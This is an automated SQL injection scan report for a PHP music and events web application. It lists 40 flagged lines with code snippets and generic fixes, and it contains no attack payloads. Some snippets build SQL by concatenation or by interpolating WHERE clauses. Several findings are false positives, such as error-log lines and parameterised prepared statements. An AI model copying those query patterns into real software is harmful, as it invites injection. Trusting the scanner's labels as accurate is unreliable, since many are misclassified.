SQL Injection Security Scan Report
Generated: 2025-12-02 23:54:45
================================================================================
Files scanned: 606
Vulnerabilities found: 40
File: admin.php
--------------------------------------------------------------------------------
Line 106: String concatenation with user input in SQL context
Code: $response = ['success' => false, 'error' => 'Invalid action: ' . $_POST['playlist_action']];
Fix: Use prepared statements with parameter binding
File: admin_api.php
--------------------------------------------------------------------------------
Line 457: String concatenation with user input in SQL context
Code: error_log("Admin API: update_user called with user_id=" . ($_GET['user_id'] ?? 'null') . ", credits=" . ($_GET['credits'] ?? 'null'));
Fix: Use prepared statements with parameter binding
File: api_events.php
--------------------------------------------------------------------------------
Line 407: WHERE clause with direct variable (may be unsafe)
Code: $pdo->prepare("DELETE FROM event_tickets WHERE event_id = ?")->execute([$event_id]);
Fix: Verify variable is validated or use prepared statement parameters
Line 410: WHERE clause with direct variable (may be unsafe)
Code: $pdo->prepare("DELETE FROM event_attendees WHERE event_id = ?")->execute([$event_id]);
Fix: Verify variable is validated or use prepared statement parameters
Line 413: WHERE clause with direct variable (may be unsafe)
Code: $pdo->prepare("DELETE FROM event_likes WHERE event_id = ?")->execute([$event_id]);
Fix: Verify variable is validated or use prepared statement parameters
Line 416: WHERE clause with direct variable (may be unsafe)
Code: $pdo->prepare("DELETE FROM event_comments WHERE event_id = ?")->execute([$event_id]);
Fix: Verify variable is validated or use prepared statement parameters
Line 419: WHERE clause with direct variable (may be unsafe)
Code: $pdo->prepare("DELETE FROM event_managers WHERE event_id = ?")->execute([$event_id]);
Fix: Verify variable is validated or use prepared statement parameters
Line 148: execute() called without prepare()
Code: $stmt->execute([
Fix: Always use ->prepare() before ->execute()
File: api_social.php
--------------------------------------------------------------------------------
Line 72: Direct query()/exec() with variable in SQL string
Code: $pdo->exec("ALTER TABLE `{$tableName}` DROP CHECK `{$name}`");
Fix: Use prepared statements with ->prepare() and ->execute()
Line 76: Direct query()/exec() with variable in SQL string
Code: $pdo->exec("ALTER TABLE `{$tableName}` DROP CONSTRAINT `{$name}`");
Fix: Use prepared statements with ->prepare() and ->execute()
Line 85: Direct query()/exec() with variable in SQL string
Code: $pdo->exec("ALTER TABLE `{$tableName}` MODIFY `rating` TINYINT UNSIGNED NOT NULL");
Fix: Use prepared statements with ->prepare() and ->execute()
Line 92: Direct query()/exec() with variable in SQL string
Code: $pdo->exec("ALTER TABLE `{$tableName}` ADD CONSTRAINT `{$constraintName}` CHECK (`rating` BETWEEN 1 AND 10)");
Fix: Use prepared statements with ->prepare() and ->execute()
File: community_fixed.php
--------------------------------------------------------------------------------
Line 376: WHERE clause with direct variable (may be unsafe)
Code: $verify_stmt = $pdo->prepare("SELECT id FROM music_tracks WHERE id IN ($placeholders)");
Fix: Verify variable is validated or use prepared statement parameters
File: events.php
--------------------------------------------------------------------------------
Line 93: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_clause
Fix: Verify variable is validated or use prepared statement parameters
File: events_modern.php
--------------------------------------------------------------------------------
Line 74: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_clause
Fix: Verify variable is validated or use prepared statement parameters
File: events_tao_inspired.php
--------------------------------------------------------------------------------
Line 74: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_clause
Fix: Verify variable is validated or use prepared statement parameters
File: fix_artist_name.php
--------------------------------------------------------------------------------
Line 28: WHERE clause with direct variable (may be unsafe)
Code: $user = $pdo->query("SELECT * FROM users WHERE id = " . $track['user_id'])->fetch();
Fix: Verify variable is validated or use prepared statement parameters
File: library.php
--------------------------------------------------------------------------------
Line 724: execute() called without prepare()
Code: $stmt->execute([$main_track['id']]);
Fix: Always use ->prepare() before ->execute()
Line 888: execute() called without prepare()
Code: $stmt->execute([$main_track['id']]);
Fix: Always use ->prepare() before ->execute()
File: admin_includes/dashboard.php
--------------------------------------------------------------------------------
Line 90: WHERE clause with direct variable (may be unsafe)
Code: WHERE {$successCondition}ulh.{$timeColumn} >= DATE_SUB(NOW(), INTERVAL 15 MINUTE)
Fix: Verify variable is validated or use prepared statement parameters
Line 111: WHERE clause with direct variable (may be unsafe)
Code: WHERE ulh.{$timeColumn} >= DATE_SUB(NOW(), INTERVAL 15 MINUTE)
Fix: Verify variable is validated or use prepared statement parameters
File: admin_includes/online_users.php
--------------------------------------------------------------------------------
Line 188: WHERE clause with direct variable (may be unsafe)
Code: WHERE {$successCondition}ulh.{$timeColumn} >= DATE_SUB(NOW(), INTERVAL 15 MINUTE)
Fix: Verify variable is validated or use prepared statement parameters
File: admin_includes/playlists.php
--------------------------------------------------------------------------------
Line 27: WHERE clause with direct variable (may be unsafe)
Code: WHERE $playlist_where
Fix: Verify variable is validated or use prepared statement parameters
File: admin_includes/purchases.php
--------------------------------------------------------------------------------
Line 69: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_clause
Fix: Verify variable is validated or use prepared statement parameters
Line 131: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_clause
Fix: Verify variable is validated or use prepared statement parameters
File: admin_includes/subscription_management.php
--------------------------------------------------------------------------------
Line 36: WHERE clause with direct variable (may be unsafe)
Code: $where_clause = !empty($where_conditions) ? "WHERE " . implode(" AND ", $where_conditions) : "";
Fix: Verify variable is validated or use prepared statement parameters
File: admin_includes/tracks.php
--------------------------------------------------------------------------------
Line 39: WHERE clause with direct variable (may be unsafe)
Code: $where_clause = !empty($where_conditions) ? "WHERE " . implode(" AND ", $where_conditions) : "";
Fix: Verify variable is validated or use prepared statement parameters
File: api/check_track_status.php
--------------------------------------------------------------------------------
Line 254: execute() called without prepare()
Code: $update_stmt->execute([
Fix: Always use ->prepare() before ->execute()
Line 333: execute() called without prepare()
Code: $update_stmt->execute([
Fix: Always use ->prepare() before ->execute()
File: api/save_album.php
--------------------------------------------------------------------------------
Line 84: execute() called without prepare()
Code: $stmt->execute([$albumId, $track['id'], $index + 1]);
Fix: Always use ->prepare() before ->execute()
File: config/database.php
--------------------------------------------------------------------------------
Line 160: Direct query()/exec() with variable in SQL string
Code: $pdo->exec("ALTER TABLE music_tracks ADD COLUMN `$column` $definition");
Fix: Use prepared statements with ->prepare() and ->execute()
File: config/email.php
--------------------------------------------------------------------------------
Line 411: WHERE clause with direct variable (may be unsafe)
Code: WHERE mt.id IN ($placeholders)
Fix: Verify variable is validated or use prepared statement parameters
File: radio/api/v1/endpoints/catalog_tracks.php
--------------------------------------------------------------------------------
Line 51: WHERE clause with direct variable (may be unsafe)
Code: $count_stmt = $pdo->prepare("SELECT COUNT(*) FROM music_tracks WHERE $where_sql");
Fix: Verify variable is validated or use prepared statement parameters
Line 60: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_sql
Fix: Verify variable is validated or use prepared statement parameters
File: radio/api/v1/endpoints/get_plays.php
--------------------------------------------------------------------------------
Line 38: WHERE clause with direct variable (may be unsafe)
Code: $count_stmt = $pdo->prepare("SELECT COUNT(*) FROM radio_play_logs WHERE $where_sql");
Fix: Verify variable is validated or use prepared statement parameters
Line 49: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_sql
Fix: Verify variable is validated or use prepared statement parameters
File: radio/catalog/index.php
--------------------------------------------------------------------------------
Line 156: WHERE clause with direct variable (may be unsafe)
Code: $count_stmt = $pdo->prepare("SELECT COUNT(*) FROM music_tracks WHERE $where_sql");
Fix: Verify variable is validated or use prepared statement parameters
Line 184: WHERE clause with direct variable (may be unsafe)
Code: WHERE $where_sql
Fix: Verify variable is validated or use prepared statement parameters
File: radio/migrations/add_live_streaming_tables.php
--------------------------------------------------------------------------------
Line 62: Direct query()/exec() with variable in SQL string
Code: $pdo->exec("ALTER TABLE $table DROP FOREIGN KEY $constraint_name");
Fix: Use prepared statements with ->prepare() and ->execute()
File: utils/optimize_database.php
--------------------------------------------------------------------------------
Line 73: Direct query()/exec() with variable in SQL string
Code: $pdo->exec("ANALYZE TABLE $table");
Fix: Use prepared statements with ->prepare() and ->execute()